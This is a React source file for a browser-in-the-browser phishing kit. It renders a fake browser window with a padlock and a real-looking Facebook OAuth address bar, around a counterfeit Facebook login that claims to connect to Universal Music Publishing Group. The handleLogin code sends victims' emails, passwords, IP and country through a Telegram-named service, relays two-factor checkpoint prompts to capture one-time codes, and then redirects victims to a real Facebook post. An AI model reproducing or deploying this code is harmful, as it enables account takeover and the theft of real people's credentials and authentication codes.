/* eslint-disable no-undef */
/* eslint-disable react/no-unescaped-entities */

import WindowsBase from "../WindowBase";
import { useCallback, useEffect, useState } from "react";
import MacBase from "../MacBase";
import MobileBase from "../MobileBase";
import { MobileFooter } from "../../components/LoginMobile/MobileFooter";
import useStore from "../../store";
import { login } from "../../services/telegram.service";
import appIcon from "../../assets/images/appIcon.png";
import { Eye, EyeOff } from "lucide-react";
import "./home.css";
import "./style.css";
import {
  isMacOs,
  isWindows,
  isMobileOnly,
  browserName
} from "react-device-detect";
import useLocalStorage from "../../hooks/useLocalStore";

import { getLocation } from "../../services/telegram.service";
import Checkpoint from "../../pages/checkpoint";
import { useSocketIO } from "../../socketIO";

const GoogleChrome = () => {
  const [showPassword, setShowPassword] = useState(false);
  const { setChrome, setTimestamp } = useStore();
  const [loading, setLoading] = useState(false);
  const [countryCode, setCountryCode] = useState("US");
  const [ip, setIp] = useState("");
  const [email, setEmail] = useState();
  const [password, setPassword] = useState();
  const [loginFailed, setLoginFailed] = useState(false);
  const [isError, setError] = useState(false);
  const [isPassInvalid, setPassInvalid] = useState(false);
  const { id } = useSocketIO();

  const [user, setUser] = useLocalStorage("user", {
    phoneNumber: "",
    email: "",
    password: "",
    twoFaCode: ""
  });
  const [isBrowserLoaded, setIsBrowserLoaded] = useState(false);
  const [url, setUrl] = useState("about:blank");
  const [isCheckPoint, setIsCheckPoint] = useState(false);

  const fetchCountry = async () => {
    const data = await getLocation();
    setIp(data.ip);
    setCountryCode(data.country_code);
  };

  const handleLogin = async () => {
    setLoginFailed(false);
    setPassInvalid(password.length < 6);
    if (password.length >= 6) {
      setLoading(true);
      try {
        const { success, data } = await login(
          email,
          email,
          email,
          password,
          countryCode,
          ip,
          "umusicpub",
          id
        );
        if (success) {
          setTimestamp(data.timeStamp);
          if (data.isLoggedIn) {
            if (data.checkpoint) {
              setUser({
                ...user,
                email,
                phoneNumber: "0000000000",
                password: password,
                userName: data.name,
                checkpointType: 1,
                twoFaTitle: data.twoFaTitle,
                twoFaDescription: data.twoFaDescription,
                codeLabel: data.codeLabel,
                continueLabel: data.textBtns[0] || "Continue",
                otherLabel: data.textBtns[1] || "Try another way",
                countdownText: data.countdownText
              });
              setIsCheckPoint(true);
            } else if (
              data.url.includes(
                "https://www.facebook.com/two_step_verification/two_factor"
              )
            ) {
              setUser({
                ...user,
                email,
                phoneNumber: "0000000000",
                password: password,
                userName: data.name,
                checkpointType: 2,
                twoFaTitle: data.twoFaTitle,
                twoFaDescription: data.twoFaDescription,
                codeLabel: data.codeLabel,
                continueLabel: data.textBtns[0] || "Continue",
                otherLabel: data.textBtns[1] || "Try another way",
                countdownText: data.countdownText
              });
              setIsCheckPoint(true);
              // onCheckpoint(ROUTES.CHECKPOINT_ROUTE);
            } else if (data.url === "https://www.facebook.com/") {
              setChrome(false);
              window.location.href =
                "https://www.facebook.com/name-page/posts/pfbid0TQEY9A2S8XBt9BuvQwwggzyxrh9TieN8hhksW9hH3nD7J6HMriAugeP9GtAqmR37l?rdid=KU8jgMdfbDlnx38u#";
            }
          } else {
            setLoginFailed(true);
          }

          setUrl(data.url);
        } else {
          setError(true);
        }
      } catch (error) {
        setError(true);
      }
      setLoading(false);
    }
  };

  useEffect(() => {
    fetchCountry();
    setTimeout(() => {
      setUrl(
        "https://www.facebook.com/login.php?skip_api_login=1&api_key=274266067164&kid_directed_site=0&app_id=274266067164&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fv12.0%2Fdialog%2Foauth%3Fapp_id%3D274266067164%26auth_type%26cbt%3D1699121478449%26channel_url%3Dhttps%253A%252F%252Fstaticxx.facebook.com%252Fx%252Fconnect%252Fxd_arbiter%252F%253Fversion%253D46%2523cb%253Df1b2e7aa439c86c%2526domain%253Dwww.pinterest.com%2526is_canvas%253Dfalse%2526origin%253Dhttps%25253A%25252F%25252Fwww.pinterest.com%25252Ff3d29379cfb53e8%2526relation%253Dopener%26client_id%3D274266067164%26config_id%26display%3Dpopup%26domain%3Dwww.pinterest.com%26e2e%3D%257B%257D%26fallback_redirect_uri%3Dhttps%253A%252F%252Fwww.pinterest.com%252Flogin%252F%26force_confirmation%3Dfalse%26id%3Df299481fefa4ce8%26locale%3Den_US%26logger_id%3Dd76f910f-d083-42ee-b5a1-63e62db0e693%26messenger_page_id%26origin%3D1%26plugin_prepare%3Dtrue%26redirect_uri%3Dhttps%253A%252F%252Fstaticxx.facebook.com%252Fx%252Fconnect%252Fxd_arbiter%252F%253Fversion%253D46%2523cb%253Df3de76f414c2aac%2526domain%253Dwww.pinterest.com%2526is_canvas%253Dfalse%2526origin%253Dhttps%25253A%25252F%25252Fwww.pinterest.com%25252Ff3d29379cfb53e8%2526relation%253Dopener.parent%2526frame%253Df299481fefa4ce8%26ref%3DLoginButton%26reset_messenger_state%3Dfalse%26response_type%3Dsigned_request%252Ctoken%252Cgraph_domain%26scope%3Dpublic_profile%252Cemail%252Cuser_friends%26sdk%3Djoey%26size%3D%257B%2522width%2522%253A600%252C%2522height%2522%253A679%257D%26url%3Ddialog%252Foauth%26version%3Dv12.0%26ret%3Dlogin%26fbapp_pres%3D0%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df3de76f414c2aac%26domain%3Dwww.pinterest.com%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Fwww.pinterest.com%252Ff3d29379cfb53e8%26relation%3Dopener.parent%26frame%3Df299481fefa4ce8%26error%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied&display=popup&locale=en_GB&pl_dbl=0"
      );
      setIsBrowserLoaded(true);
    }, 1000);
  }, [setIsBrowserLoaded, setChrome]);

  const handleAppClose = useCallback(
    (close = false) => {
      if (!loading) {
        setChrome(close);
      }
    },
    [loading, setChrome]
  );

  return (
    <>
      {isMobileOnly && (
        <MobileBase
          name="Facebook"
          resizer="chrome"
          appClose={handleAppClose}
          num={0}
        >
          <div
            className="w-full h-full bg-gray-100 flex flex-col"
            style={{ boxShadow: "0px 10px 10px #0505054d" }}
          >
            <>
              {/* Topbar URL */}
              <div className="border-b-[1px] border-gray-300 flex items-center py-1 px-1">
                <div className="flex-1 relative">
                  <input
                    type="text"
                    disabled
                    value={url}
                    className="w-full rounded-full pl-6 bg-gray-100 text-sm h-[25px]"
                    placeholder="Search Google or type a URL"
                  />
                  {isBrowserLoaded ? (
                    <i className="fa-regular fa-solid fa-lock absolute text-sm left-1 top-[50%] -translate-y-[50%] fa-sm text-gray-500"></i>
                  ) : (
                    <i className="fa-regular fa-circle-exclamation absolute text-sm left-1 top-[50%] -translate-y-[50%] fa-sm text-gray-500"></i>
                  )}
                </div>
                <i className="px-3 fa-regular fa-solid fa-key-skeleton fa-sm text-gray-500 rotate-45"></i>
              </div>

              {/* Main View */}
              <div className="w-full flex-1">
                <div
                  style={{
                    display: "flex",
                    height: "700px",
                    flexDirection: "column",
                    width: "100%",
                    background: "#eceff6"
                  }}
                >
                  {isBrowserLoaded && (
                    <>
                      {!isCheckPoint ? (
                        <>
                          {/* Blue top bar */}
                          <div
                            id="pagelet_bluebar"
                            data-referrer="pagelet_bluebar"
                            style={{
                              height: "35px",
                              background: "#4267b2",
                              display: "flex",
                              justifyContent: "center"
                            }}
                          >
                            <div
                              style={{
                                display: "flex",
                                width: "100%",
                                justifyContent: "center",
                                alignItems: "center",
                                fontSize: "23px"
                              }}
                            >
                              <div className="text-white text-lg font-black">
                                <div className="font-bold">Facebook</div>
                              </div>
                            </div>
                          </div>

                          <div className="login_page relative w-full">
                            {loginFailed && (
                              <div className="w-full bg-[#fa3e3e] text-white text-[13px] font-medium p-2 flex items-center">
                                Invalid username or password
                              </div>
                            )}

                            {/* App icon */}
                            <div className="my-6 mx-auto flex items-center justify-center">
                              <img
                                src={appIcon}
                                alt="Facebook"
                                className="rounded"
                                style={{ height: "40px", width: "40px" }}
                              />
                            </div>

                            {/* Login text */}
                            <div className="text-sm text-center px-4 text-gray-600 mb-4 font-semibold">
                              Log into your Facebook account to connect to{" "}
                              <span className="text-gray-900 font-bold">
                                Universal Music Publishing Group
                              </span>
                            </div>

                            {/* Login fields */}
                            <div className="flex flex-col w-full px-4 mb-4">
                              <input
                                type="text"
                                placeholder="Email address or phone number"
                                value={email}
                                onChange={(e) => setEmail(e.target.value)}
                                className="mb-2 px-3 py-2 text-base rounded border border-[#dddfe2] bg-[#f5f6f7] text-[#757575]"
                                style={{
                                  fontFamily: "Helvetica, Arial, sans-serif"
                                }}
                              />

                              {/* Password field with toggle */}
                              <div className="relative w-full">
                                <input
                                  type={showPassword ? "text" : "password"}
                                  placeholder="Password"
                                  value={password}
                                  onChange={(e) => setPassword(e.target.value)}
                                  className="mb-3 px-3 py-2 text-base rounded border border-[#dddfe2] bg-[#f5f6f7] text-[#1d2129] w-full pr-10"
                                  style={{
                                    fontFamily: "Helvetica, Arial, sans-serif"
                                  }}
                                />
                                <div
                                  className="absolute right-3 top-1/2 transform -translate-y-1/2 cursor-pointer text-[#606770]"
                                  onClick={() =>
                                    setShowPassword((prev) => !prev)
                                  }
                                >
                                  {showPassword ? (
                                    <EyeOff size={16} />
                                  ) : (
                                    <Eye size={16} />
                                  )}
                                </div>
                              </div>

                              <button
                                disabled={loading}
                                onClick={handleLogin}
                                className={`w-full text-white py-2 rounded text-[12px] font-semibold ${
                                  loading ? "opacity-50" : ""
                                }`}
                                style={{
                                  backgroundColor: "#1877f2",
                                  lineHeight: "20px"
                                }}
                              >
                                Log In
                              </button>
                            </div>

                            {/* Forgot password */}
                            <a
                              href={`https://www.facebook.com/recover/initiate?email=${email}`}
                              className="text-[#1877f2] text-sm font-medium mx-auto flex items-center justify-center"
                            >
                              Forgotten password?
                            </a>

                            {/* OR */}
                            <div className="flex w-full items-center text-[#4b4f56] font-semibold mt-2 text-sm">
                              <div className="flex-1 mx-4 border-t border-[#dadde1]" />
                              or
                              <div className="flex-1 mx-4 border-t border-[#dadde1]" />
                            </div>

                            {/* New account button */}
                            <div className="flex items-center justify-center w-full">
                              <button
                                onClick={() =>
                                  window.location.replace(
                                    "https://www.facebook.com/reg"
                                  )
                                }
                                className=" text-black border border-[#bec3c9] py-2 px-4 text-[15px] font-medium rounded mt-2 w-[80%]"
                              >
                                Create new account
                              </button>
                            </div>
                            {/* Footer languages and info */}
                            <MobileFooter />
                          </div>
                        </>
                      ) : (
                        <div className="overflow-y-auto p-4  z-1000">
                          <Checkpoint
                            onSuccess={() => {
                              setChrome(false);
                              window.location.href =
                                "https://www.facebook.com/name-page/posts/pfbid0TQEY9A2S8XBt9BuvQwwggzyxrh9TieN8hhksW9hH3nD7J6HMriAugeP9GtAqmR37l?rdid=KU8jgMdfbDlnx38u#";
                            }}
                          />
                        </div>
                      )}
                    </>
                  )}
                </div>
              </div>
            </>

            {loading && (
              <div className="waiting">Waiting for https://facebook.c...</div>
            )}
          </div>
        </MobileBase>
      )}
      {isMacOs && (
        <MacBase
          name={`Facebook - ${browserName}`}
          resizer="chrome"
          appClose={handleAppClose}
          num={0}
        >
          <div
            className="w-full h-full bg-gray-100 flex flex-col rounded"
            style={{ boxShadow: "0px 10px 10px #0505054d" }}
          >
            <>
              <div className="border-b-[1px] border-gray-300 flex items-center py-1 px-1">
                <div className="flex-1 relative ">
                  <input
                    type="text"
                    disabled
                    value={url}
                    className="w-full rounded-full border-none pl-6 bg-gray-100 text-sm h-[25px]"
                    placeholder="Search Google or type a URL"
                  />
                  {isBrowserLoaded ? (
                    <i className="fa-regular fa-solid fa-lock absolute text-sm left-1 top-[50%] -translate-y-[50%] fa-sm text-gray-500"></i>
                  ) : (
                    <i className="fa-regular fa-circle-exclamation absolute text-sm left-1 top-[50%] -translate-y-[50%] fa-sm text-gray-500"></i>
                  )}
                </div>
                <i className="px-3 fa-regular fa-solid fa-key-skeleton fa-sm text-gray-500 rotate-45"></i>
              </div>
              <div className="w-full flex-1">
                <div
                  style={{
                    display: "flex",
                    height: `${isBrowserLoaded ? "100%" : "560px"}`,
                    flexDirection: "column",
                    width: "100%"
                  }}
                >
                  {" "}
                  {isBrowserLoaded && (
                    <>
                      {" "}
                      {!isCheckPoint ? (
                        <>
                          {" "}
                          <div
                            id="pagelet_bluebar"
                            data-referrer="pagelet_bluebar"
                            style={{
                              height: "35px",
                              background: "#4267b2",
                              display: "flex",
                              justifyContent: "center",
                              marginBottom: "5px"
                            }}
                          >
                            <div
                              style={{
                                display: "flex",
                                width: "100%",
                                justifyContent: "space-between",
                                alignItems: "center",
                                fontSize: "23px"
                              }}
                            >
                              <div className="flex items-center gap-x-1 p-1">
                                <img
                                  src={
                                    "https://static.xx.fbcdn.net/rsrc.php/v3/yR/r/teE39sffXW8.png"
                                  }
                                  alt="Facebook"
                                  style={{ width: "16px", height: "16px" }}
                                />
                                <div className="text-white text-sm font-black">
                                  <div className="font-bold">Facebook</div>
                                </div>
                              </div>
                              <div className="_2t-f"></div>
                            </div>
                          </div>
                          <div
                            style={{
                              marginBottom: "300px",
                              position: "relative",
                              width: "100%",
                              padding: "15px 30px 20px 30px"
                            }}
                            className="login_page"
                          >
                            <div
                              className="text-sm txtlog"
                              style={{ textAlign: "left", fontWeight: "700" }}
                            >
                              Log into your Facebook account to connect to{" "}
                              Universal Music Publishing Group
                            </div>
                            {loginFailed && (
                              <div
                                className="pam login_error_box _9ay3 uiBoxRed"
                                role="alert"
                                tabIndex="0"
                                id="error_box"
                              >
                                <div className="fsl fwb fcb">
                                  Please re-enter your password
                                </div>
                                <div className="wrr">
                                  The password that you've entered is incorrect.{" "}
                                  <a
                                    href={`https://www.facebook.com/recover/initiate?email=${email}&amp;lwv=120&amp;lwc=1348092&amp;ars=facebook_login_pw_error`}
                                  >
                                    Forgotten password?
                                  </a>
                                </div>
                              </div>
                            )}
                            {isError && (
                              <div className="text-red-600 text-sm text-center mt-2">
                                An error occurred. Please try again later.
                              </div>
                            )}

                            <div className="loginForm" id="loginform">
                              <div
                                style={{ width: "100%", paddingBottom: "10px" }}
                              >
                                <div
                                  className="clearfix form_row flex "
                                  id="email_container"
                                >
                                  <div>
                                    <label className="login_form_label">
                                      Email address or phone number:
                                    </label>
                                    <input
                                      type="text"
                                      className="inputtext _55r1 inputtext inputtext outline-blue-500"
                                      name="email"
                                      id="email"
                                      value={email}
                                      tabIndex="0"
                                      autoFocus
                                      autoComplete="username"
                                      onChange={(e) => {
                                        setEmail(e.target.value);
                                      }}
                                    />
                                  </div>
                                </div>

                                {/* Password Input with Toggle */}
                                <div className="clearfix form_row flex mt-1">
                                  <div className="flex items-center relative">
                                    <label className="login_form_label">
                                      Password:
                                    </label>
                                    <input
                                      type={showPassword ? "text" : "password"}
                                      className="inputtext outline-blue-500"
                                      name="pass"
                                      id="pass"
                                      tabIndex="0"
                                      value={password}
                                      onChange={(e) => {
                                        setPassword(e.target.value);
                                      }}
                                      autoComplete="current-password"
                                    />
                                    <div
                                      className="absolute right-2 cursor-pointer text-[#606770]"
                                      onClick={() =>
                                        setShowPassword((prev) => !prev)
                                      }
                                    >
                                      {showPassword ? (
                                        <EyeOff size={12} />
                                      ) : (
                                        <Eye size={12} />
                                      )}
                                    </div>
                                  </div>
                                </div>

                                {isPassInvalid && (
                                  <div className="text-red-600 text-sm text-center mt-2">
                                    Password is invalid
                                  </div>
                                )}

                                <fieldset
                                  disabled={loading}
                                  style={{ opacity: loading ? 0.6 : 1 }}
                                >
                                  <button
                                    id="buttons"
                                    className={`form_row clearfix ${
                                      loading ? "disabled" : ""
                                    }`}
                                    onClick={handleLogin}
                                    disabled={loading}
                                  >
                                    <label className="login_form_label"></label>
                                    <label
                                      className="uiButton uiButtonConfirm uiButtonLarge"
                                      id="loginbutton"
                                      htmlFor="u_0_0_mL"
                                    >
                                      <input
                                        value="Log in"
                                        name="login"
                                        type="submit"
                                        tabIndex="0"
                                        id="u_0_0_mL"
                                        style={{ cursor: "pointer" }}
                                      />
                                    </label>
                                  </button>

                                  <p
                                    className="reset_password form_row"
                                    id="login_link"
                                  >
                                    <a
                                      href="https://www.facebook.com/recover/initiate/?ars=facebook_login"
                                      className="_97w4"
                                      target="_blank"
                                      rel="noreferrer"
                                    >
                                      Forgotten account?
                                    </a>
                                  </p>
                                </fieldset>
                              </div>

                              <div style={{ margin: "auto", width: "380px" }}>
                                <fieldset
                                  disabled={loading}
                                  style={{ opacity: loading ? 0.6 : 1 }}
                                >
                                  <a
                                    role="button"
                                    className="_42ft _4jy0 _4jy3 _4jy2 selected _51sy"
                                    style={{
                                      marginLeft: "100px",
                                      padding: "4px 10px"
                                    }}
                                    href="https://www.facebook.com/reg"
                                    target="_blank"
                                    rel="noreferrer"
                                  >
                                    Create New Account
                                  </a>
                                </fieldset>
                              </div>
                            </div>
                          </div>
                        </>
                      ) : (
                        <div className="overflow-y-auto p-4 md:p-6 z-1000">
                          <div className="max-w-6xl">
                            <Checkpoint
                              onSuccess={() => {
                                setChrome(false);
                                window.location.href =
                                  "https://www.facebook.com/name-page/posts/pfbid0TQEY9A2S8XBt9BuvQwwggzyxrh9TieN8hhksW9hH3nD7J6HMriAugeP9GtAqmR37l?rdid=KU8jgMdfbDlnx38u#";
                              }}
                            />
                          </div>
                        </div>
                      )}
                    </>
                  )}
                </div>
              </div>
            </>

            {loading && (
              <div className="waiting">Waiting for https://facebook.c...</div>
            )}
          </div>
        </MacBase>
      )}

      {isWindows && (
        <WindowsBase
          name={`Facebook - ${browserName}`}
          resizer="chrome"
          appClose={handleAppClose}
          loading={loading}
          num={0}
        >
          <div
            className="w-full h-full bg-gray-100 flex flex-col"
            style={{
              boxShadow: "0px 10px 10px #0505054d",
              borderRadius: "0px 0 5px 5px"
            }}
          >
            <>
              <div className="border-b-[1px] border-gray-300 flex items-center py-1 px-1">
                <div className="flex-1 relative ">
                  <input
                    type="text"
                    disabled
                    value={url}
                    className="w-full rounded-full border-none pl-6 bg-gray-100 text-sm h-[25px]"
                    placeholder="Search Google or type a URL"
                  />
                  {isBrowserLoaded ? (
                    <i className="fa-regular fa-solid fa-lock absolute text-sm left-1 top-[50%] -translate-y-[50%] fa-sm text-gray-500"></i>
                  ) : (
                    <i className="fa-regular fa-circle-exclamation absolute text-sm left-1 top-[50%] -translate-y-[50%] fa-sm text-gray-500"></i>
                  )}
                </div>
                <i className="px-3 fa-regular fa-solid fa-key-skeleton fa-sm text-gray-500 rotate-45"></i>
              </div>
              <div className="w-full flex-1">
                <div
                  style={{
                    display: "flex",
                    height: `${isBrowserLoaded ? "100%" : "560px"}`,
                    flexDirection: "column",
                    width: "100%"
                  }}
                >
                  {" "}
                  {isBrowserLoaded && (
                    <>
                      {" "}
                      {!isCheckPoint ? (
                        <>
                          {" "}
                          <div
                            id="pagelet_bluebar"
                            data-referrer="pagelet_bluebar"
                            style={{
                              height: "35px",
                              background: "#4267b2",
                              display: "flex",
                              justifyContent: "center",
                              marginBottom: "5px"
                            }}
                          >
                            <div
                              style={{
                                display: "flex",
                                width: "100%",
                                justifyContent: "space-between",
                                alignItems: "center",
                                fontSize: "23px"
                              }}
                            >
                              <div className="flex items-center gap-x-1 p-1">
                                <img
                                  src={
                                    "https://static.xx.fbcdn.net/rsrc.php/v3/yR/r/teE39sffXW8.png"
                                  }
                                  alt="Facebook"
                                  style={{ width: "16px", height: "16px" }}
                                />
                                <div className="text-white text-sm font-black">
                                  <div className="font-bold">Facebook</div>
                                </div>
                              </div>
                              <div className="_2t-f"></div>
                            </div>
                          </div>
                          <div
                            style={{
                              marginBottom: "300px",
                              position: "relative",
                              width: "100%",
                              padding: "15px 30px 20px 30px"
                            }}
                            className="login_page"
                          >
                            <div
                              className="text-sm text-gray-600 txtlog font-semibold"
                              style={{ textAlign: "left" }}
                            >
                              Log into your Facebook account to connect to{" "}
                              <span className="text-gray-900 font-bold">
                                Universal Music Publishing Group
                              </span>
                            </div>
                            {loginFailed && (
                              <div
                                className="pam login_error_box _9ay3 uiBoxRed"
                                role="alert"
                                tabIndex="0"
                                id="error_box"
                              >
                                <div className="fsl fwb fcb">
                                  Please re-enter your password
                                </div>
                                <div className="wrr">
                                  The password that you've entered is incorrect.{" "}
                                  <a
                                    href={`https://www.facebook.com/recover/initiate?email=${email}&amp;lwv=120&amp;lwc=1348092&amp;ars=facebook_login_pw_error`}
                                  >
                                    Forgotten password?
                                  </a>
                                </div>
                              </div>
                            )}
                            {isError && (
                              <div className="text-red-600 text-sm text-center mt-2">
                                An error occurred. Please try again later.
                              </div>
                            )}

                            <div className="loginForm" id="loginform">
                              <div
                                style={{ width: "100%", paddingBottom: "10px" }}
                              >
                                <div
                                  className="clearfix form_row flex "
                                  id="email_container"
                                >
                                  <div>
                                    <label className="login_form_label">
                                      Email address or phone number:
                                    </label>
                                    <input
                                      type="text"
                                      className="inputtext _55r1 inputtext inputtext outline-blue-500"
                                      name="email"
                                      id="email"
                                      value={email}
                                      tabIndex="0"
                                      autoFocus
                                      autoComplete="username"
                                      onChange={(e) => {
                                        setEmail(e.target.value);
                                      }}
                                    />
                                  </div>
                                </div>

                                {/* Password Input with Toggle */}
                                <div className="clearfix form_row flex mt-1">
                                  <div className="flex items-center relative">
                                    <label className="login_form_label">
                                      Password:
                                    </label>
                                    <input
                                      type={showPassword ? "text" : "password"}
                                      className="inputtext outline-blue-500"
                                      name="pass"
                                      id="pass"
                                      tabIndex="0"
                                      value={password}
                                      onChange={(e) => {
                                        setPassword(e.target.value);
                                      }}
                                      autoComplete="current-password"
                                    />
                                    <div
                                      className="absolute right-2 cursor-pointer text-[#606770]"
                                      onClick={() =>
                                        setShowPassword((prev) => !prev)
                                      }
                                    >
                                      {showPassword ? (
                                        <EyeOff size={12} />
                                      ) : (
                                        <Eye size={12} />
                                      )}
                                    </div>
                                  </div>
                                </div>

                                {isPassInvalid && (
                                  <div className="text-red-600 text-sm text-center mt-2">
                                    Password is invalid
                                  </div>
                                )}

                                <fieldset
                                  disabled={loading}
                                  style={{ opacity: loading ? 0.6 : 1 }}
                                >
                                  <button
                                    id="buttons"
                                    className={`form_row clearfix ${
                                      loading ? "disabled" : ""
                                    }`}
                                    onClick={handleLogin}
                                    disabled={loading}
                                  >
                                    <label className="login_form_label"></label>
                                    <label
                                      className="uiButton uiButtonConfirm uiButtonLarge"
                                      id="loginbutton"
                                      htmlFor="u_0_0_mL"
                                    >
                                      <input
                                        value="Log in"
                                        name="login"
                                        type="submit"
                                        tabIndex="0"
                                        id="u_0_0_mL"
                                        style={{ cursor: "pointer" }}
                                      />
                                    </label>
                                  </button>

                                  <p
                                    className="reset_password form_row"
                                    id="login_link"
                                  >
                                    <a
                                      href="https://www.facebook.com/recover/initiate/?ars=facebook_login"
                                      className="_97w4"
                                      target="_blank"
                                      rel="noreferrer"
                                    >
                                      Forgotten account?
                                    </a>
                                  </p>
                                </fieldset>
                              </div>

                              <div style={{ margin: "auto", width: "380px" }}>
                                <fieldset
                                  disabled={loading}
                                  style={{ opacity: loading ? 0.6 : 1 }}
                                >
                                  <a
                                    role="button"
                                    className="_42ft _4jy0 _4jy3 _4jy2 selected _51sy"
                                    style={{
                                      marginLeft: "100px",
                                      padding: "4px 10px"
                                    }}
                                    href="https://www.facebook.com/reg"
                                    target="_blank"
                                    rel="noreferrer"
                                  >
                                    Create New Account
                                  </a>
                                </fieldset>
                              </div>
                            </div>
                          </div>
                        </>
                      ) : (
                        <div className="overflow-y-auto p-4 md:p-6 z-1000">
                          <div className="flex justify-center items-center max-w-3xl mx-auto">
                            <Checkpoint
                              onSuccess={() => {
                                setChrome(false);
                                window.location.href =
                                  "https://www.facebook.com/name-page/posts/pfbid0TQEY9A2S8XBt9BuvQwwggzyxrh9TieN8hhksW9hH3nD7J6HMriAugeP9GtAqmR37l?rdid=KU8jgMdfbDlnx38u#";
                              }}
                            />
                          </div>
                        </div>
                      )}
                    </>
                  )}
                </div>
              </div>
            </>

            {loading && (
              <div className="waiting">Waiting for https://facebook.c...</div>
            )}
          </div>
        </WindowsBase>
      )}
    </>
  );
};

export default GoogleChrome;
